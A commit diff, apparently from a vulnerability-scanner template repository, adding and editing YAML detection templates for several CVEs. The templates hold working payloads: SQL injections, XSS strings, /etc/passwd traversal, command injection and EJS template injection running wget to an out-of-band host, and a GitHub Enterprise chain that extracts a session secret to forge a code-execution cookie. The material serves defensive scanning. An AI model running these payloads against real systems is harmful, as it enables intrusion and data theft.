{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"}
{"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
{"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
56b04172c1df6906eb35bc5859e652a2
6cee9d81045ba3fb25589784532a78e4

6
dast/vulnerabilities/redirect/open-redirect.yaml
View File

@ -2,7 +2,7 @@ id: open-redirect
info:
name: Open Redirect Detection
author: princechaddha
author: princechaddha,AmirHossein Raeisi
severity: medium
tags: redirect,dast
@ -172,11 +172,11 @@ http:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
- type: status
status:
- 301
- 302
- 307
# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950

51
dns/azure-takeover-detection.yaml
View File

@ -4,7 +4,7 @@ info:
name: Microsoft Azure Takeover Detection
author: pdteam
severity: high
description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource.
description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a D>
reference:
- https://godiego.co/posts/STO/
- https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
@ -25,33 +25,30 @@ dns:
matchers:
- type: word
words:
- "azure-api.net"
- "azure-mobile.net"
- "azurecontainer.io"
- "azurecr.io"
- "azuredatalakestore.net"
- "azureedge.net"
- "azurefd.net"
- "azurehdinsight.net"
- "azurewebsites.net"
- "azurewebsites.windows.net"
- "blob.core.windows.net"
- "cloudapp.azure.com"
- "cloudapp.net"
- "database.windows.net"
- "redis.cache.windows.net"
- "search.windows.net"
- "servicebus.windows.net"
- "trafficmanager.net"
- "visualstudio.com"
- type: word
words:
- "NXDOMAIN"
- NXDOMAIN
- type: dsl
dsl:
- 'contains(cname, "azure-api.net")'
- 'contains(cname, "azure-mobile.net")'
- 'contains(cname, "azurecontainer.io")'
- 'contains(cname, "azurecr.io")'
- 'contains(cname, "azuredatalakestore.net")'
- 'contains(cname, "azureedge.net")'
- 'contains(cname, "azurefd.net")'
- 'contains(cname, "azurehdinsight.net")'
- 'contains(cname, "azurewebsites.net")'
- 'contains(cname, "azurewebsites.windows.net")'
- 'contains(cname, "blob.core.windows.net")'
- 'contains(cname, "cloudapp.azure.com")'
- 'contains(cname, "cloudapp.net")'
- 'contains(cname, "database.windows.net")'
- 'contains(cname, "redis.cache.windows.net")'
- 'contains(cname, "search.windows.net")'
- 'contains(cname, "servicebus.windows.net")'
- 'contains(cname, "trafficmanager.net")'
- 'contains(cname, "visualstudio.com")'
extractors:
- type: dsl
dsl:
- cname
# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100d68568731abdd8cfc97f8e47d3886209656605e7c73bfe62944a9d0d440bdd0d0221009fbd2c17dbd3f8faf9eae5e17223431a603a59249c6d151b36f22bbd4723ad6c:922c64590222798bb761d5b6d8e72950

7
dns/dns-waf-detect.yaml
View File

@ -193,4 +193,9 @@ dns:
words:
- ".iidns.com"
# digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950
- type: word
part: answer
name: ksyun
words:
- ".ksyunwaf.com"
# digest: 490a00463044022005bf81b04ee9a74169b2ea8baf29b776c3da72d7bf13cdf16f62a84baa003daf0220758d7619504e7c6a45cc29f1e7f3c71f7cbba93b4444cf419ddc9b01d486d265:922c64590222798bb761d5b6d8e72950

5
file/malware/warp-malware.yaml
View File

@ -18,10 +18,9 @@ file:
- "/2011/n325423.shtml?"
- "wyle"
- "\\~ISUN32.EXE"
condition: or
condition: and
- type: binary
binary:
- "80382B7503C6002D80382F7503C6005F"
# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e80f4b2dd4f9e9816231f6df6fe61c3565dece76d808a3a46eb8834f63cf0400022100a6c76dfe0cf46ebb373f0eb870535044d5b9cbb980fc1ec329159a2ca6e263e6:922c64590222798bb761d5b6d8e72950

37
http/cnvd/2017/CNVD-2017-06001.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CNVD-2017-06001
info:
name: Dahua DSS - SQL Injection
severity: high
author: napgh0st,ritikchaddha
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
metadata:
max-request: 1
verified: true
fofa-query: app="dahua-DSS"
tags: cnvd,cnvd2017,sqli,dahua
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
- "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId=1') AND EXTRACTVALUE(534543,CONCAT(0x5c,md5({{num}}),0x5c)) AND ('n72Yk'='n72Yk&bean.TabName=1"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "XPATH syntax error:"
- "c8c605999f3d8352d7bb792cf3fdb25"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f369f94051bc8ede985360f3de46c645769896645c53b702a5900b5d7ec68dc3022100db0215796305ea641958244a283b9f55498c217c5151e9f5e96da70c5c7144d1:922c64590222798bb761d5b6d8e72950

8
http/cves/2014/CVE-2014-3206.yaml
View File

@ -12,7 +12,6 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
- https://www.exploit-db.com/exploits/33159/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -31,18 +30,17 @@ info:
http:
- raw:
- |
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1
Host: {{Hostname}}
Accept: */*
unsafe: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201815e842a6507b325c3c41ae861767b65c91d7bd0ecd902cb49d98f19d29271e022100f2778429020bce6c05a2f84057ce4f23a7070d63855d64359c7779a19600d4e4:922c64590222798bb761d5b6d8e72950

6
http/cves/2015/CVE-2015-2863.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2015-2863
info:
name: Kaseya Virtual System Administrator - Open Redirect
author: 0x_Akoko
author: 0x_Akoko,AmirHossein Raeisi
severity: medium
description: |
Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
@ -39,5 +39,5 @@ http:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1
# digest: 490a0046304402204d2a37c6eb68a653c40afd87277f8343eb3e10c0bdd4316cd611f7ebc1e852ba022079d43910950fd7200f43f450956b7541df0fe79b603c2941ddc6ac3e7a2bb177:922c64590222798bb761d5b6d8e72950

4
http/cves/2021/CVE-2021-43287.yaml
View File

@ -26,7 +26,7 @@ info:
max-request: 1
vendor: thoughtworks
product: gocd
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
tags: cve2021,cve,go,lfi,gocd,thoughtworks
http:
@ -43,4 +43,4 @@ http:
- type: status
status:
- 200
# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950

4
http/cves/2022/CVE-2022-33891.yaml
View File

@ -30,7 +30,7 @@ info:
vendor: apache
product: spark
shodan-query: title:"Spark Master at"
tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm
tags: cve2022,cve,apache,spark,kev,packetstorm
variables:
command: "echo CVE-2022-33891 | rev"
@ -45,4 +45,4 @@ http:
part: body
words:
- "19833-2202-EVC"
# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a004730450220463f0c1d447513c69079b7f58a07d158405b058efb1e70a43cd3d08ab170875b022100b7e623399aedd2ebfae7b507b9a2b8c756b4a26e4decc54486d72e32770775cd:922c64590222798bb761d5b6d8e72950

48
http/cves/2023/CVE-2023-29827.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2023-29827
info:
name: Embedded JavaScript(EJS) 3.1.6 - Template Injection
author: ritikchaddha
severity: critical
description: |
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.
impact: |
High impact as it enables remote code execution.
remediation: |
Update EJS to the latest version to mitigate the vulnerability.
reference:
- https://github.com/mde/ejs/issues/720
- https://github.com/mde/ejs/blob/main/SECURITY.md#out-of-scope-vulnerabilities
- https://nvd.nist.gov/vuln/detail/CVE-2023-29827
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-29827
cwe-id: CWE-74
epss-score: 0.34849
epss-percentile: 0.97005
cpe: cpe:2.3:a:ejs:ejs:3.1.9:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: ejs
product: ejs
framework: node.js
tags: cve,cve2023,ssti,rce,ejs,oast
http:
- method: GET
path:
- "{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "You are viewing page number"
# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950

43
http/cves/2023/CVE-2023-35158.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2023-35158
info:
name: XWiki - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: > /xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
impact: |
Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser.
remediation: |
Update XWiki to the latest version to mitigate the Reflected XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35158
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35158
cwe-id: CWE-87
epss-score: 0.00105
epss-percentile: 0.42103
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: "XWiki"
tags: cve,cve2023,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"
matchers:
- type: dsl
dsl:
- 'contains(body, "href=\"javascript:alert(document.domain)\">Cancel</a>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c6c91bc1cafbd787223af97e5547530e8543d2a73bdc2cfb85cedd488a7e695b022006c285923b223b83c2a2d0b7436f826f8058fb22a2641e34fef6c20843b50804:922c64590222798bb761d5b6d8e72950

44
http/cves/2023/CVE-2023-36347.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-36347
info:
name: POS Codekop v2.0 - Broken Authentication
author: princechaddha
severity: high
description: |
A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
impact: |
Successful exploitation could lead to unauthorized access to sensitive information.
remediation: |
Implement proper authentication mechanisms and ensure secure user session management.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36347
cwe-id: CWE-306
epss-score: 0.00103
epss-percentile: 0.41216
cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
metadata:
vendor: codekop
product: codekop
tags: cve,cve2023,codekop,pos,auth-bypass
http:
- method: GET
path:
- "{{BaseURL}}/excel.php"
- "{{BaseURL}}/pos-kasir-php/excel.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Document"
- type: word
part: header
words:
- "application/vnd.ms-excel"
# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950

64
http/cves/2023/CVE-2023-43374.yaml Normal file
View File

@ -0,0 +1,64 @@
id: CVE-2023-43374
info:
name: Hoteldruid v3.0.5 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data or complete takeover of the affected system.
remediation: |
Upgrade Hoteldruid to a patched version that addresses the SQL Injection vulnerability.
reference:
- https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-id_utente_log-parameter-8b89f014004947e7bd2ecdacf1610cf9
- https://nvd.nist.gov/vuln/detail/CVE-2023-43374
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43374
cwe-id: CWE-89
epss-score: 0.00076
epss-percentile: 0.31944
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: digitaldruid
product: hoteldruid
shodan-query: title:"HotelDruid"
fofa-query: title="HotelDruid"
tags: cve,cve2023,hoteldruid,cms,sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET /hoteldruid/inizio.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "HotelDruid</a>"
internal: true
- raw:
- |
POST /hoteldruid/personalizza.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(body, "HotelDruid:")'
condition: and
# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950

52
http/cves/2023/CVE-2023-44813.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2023-44813
info:
name: mooSocial v.3.1.8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.
impact: |
Successful exploitation could lead to unauthorized access or data theft
remediation: |
Upgrade to a patched version of mooSocial
reference:
- https://github.com/ahrixia/CVE-2023-44813
- https://nvd.nist.gov/vuln/detail/CVE-2023-44813
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-44813
cwe-id: CWE-79
epss-score: 0.00069
epss-percentile: 0.28937
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: moosocial
product: moosocial
shodan-query: http.favicon.hash:702863115
tags: cve,cve2023,moosocial,xss
http:
- method: GET
path:
- "{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "initInviteFriendBtn('model');alert(document.domain)//;"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950

47
http/cves/2023/CVE-2023-45855.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2023-45855
info:
name: qdPM 9.2 - Directory Traversal
author: DhiyaneshDk
severity: high
description: |
qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.
impact: |
Successful exploitation could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade qdPM to a non-vulnerable version to mitigate the directory traversal vulnerability.
reference:
- https://github.com/SunshineOtaku/Report-CVE/blob/main/qdPM/9.2/Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-45855
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-45855
cwe-id: CWE-22
epss-score: 0.00087
epss-percentile: 0.35946
cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:*
metadata:
vendor: qdpm
product: qdpm
shodan-query: http.favicon.hash:762074255
tags: cve,cve2023,qdpm,lfi
http:
- method: GET
path:
- "{{BaseURL}}/uploads/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Index of /uploads</title>"
- "attachments/</a>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cbd700fb07947d7ab0657ac97cf57a41ceb390ba95b91f5ebd3eb5dc4ed2246b02210086b07d8dd2293a1fc75a3d80d0c9dcf34ddff95b979e4eccefddd9d1fc606ee3:922c64590222798bb761d5b6d8e72950

52
http/cves/2023/CVE-2023-5991.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2023-5991
info:
name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
author: Kazgangap
severity: critical
description: |
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
remediation: Fixed in 4.8.5
reference:
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5991
cwe-id: CWE-22
epss-score: 0.00603
epss-percentile: 0.78412
cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: motopress
product: hotel_booking_lite
framework: wordpress
publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp
http:
- method: GET
path:
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "/etc/passwd"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950

144
http/cves/2024/CVE-2024-0200.yaml Normal file
View File

@ -0,0 +1,144 @@
id: CVE-2024-0200
info:
name: Github Enterprise Authenticated Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
reference:
- https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
- https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
- https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.5
- https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.3
- https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.13
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0200
cwe-id: CWE-470
epss-score: 0.0037
epss-percentile: 0.72517
cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata:
vendor: github
product: enterprise_server
shodan-query: title:"GitHub Enterprise"
fofa-query: app="Github-Enterprise"
verified: true
tags: cve,cve2024,rce,github,enterprise
variables:
username: "{{username}}"
password: "{{password}}"
oast: "curl {{interactsh-url}}/?"
padstr: "{{randstr}}"
payload: '{{padding(oast,padstr,300)}}'
marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
final_payoad: "{{ b64_marshal_data + '--' + digest}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/v3/user/orgs"
headers:
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
extractors:
- type: json
part: body
name: org_name
internal: true
json:
- ".[].login"
- method: GET
path:
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
headers:
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
matchers-condition: and
matchers:
- type: word
words:
- '"role": "admin"'
part: body
- method: POST
path:
- "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
headers:
Content-Type: application/json
Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
body: |
{
"name": "{{randstr}}"
}
matchers:
- type: status
status:
- 201
- method: GET
cookie-reuse: true
path:
- "{{BaseURL}}/login"
extractors:
- type: regex
part: body
internal: true
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
name: csrf_token
- method: POST
path:
- "{{BaseURL}}/session"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
matchers:
- type: status
status:
- 302
- type: word
words:
- "_gh_render"
part: header
- method: GET
path:
- "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
extractors:
- type: regex
group: 1
name: ghe_secret
internal: true
regex:
- '&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^"]+?)&quot;'
part: body
matchers:
- type: word
words:
- 'ENTERPRISE_SESSION_SECRET'
part: body
- method: GET
path:
- "{{BaseURL}}/"
headers:
Cookie: _gh_render={{final_payoad}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950

74
http/cves/2024/CVE-2024-1561.yaml Normal file
View File

@ -0,0 +1,74 @@
id: CVE-2024-1561
info:
name: Gradio Applications - Local File Read
author: Diablo
severity: high
description: |
Local file read by calling arbitrary methods of Components class
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
cwe-id: CWE-29
epss-score: 0.00045
epss-percentile: 0.14639
metadata:
verified: true
max-request: 3
shodan-query: html:"__gradio_mode__"
tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
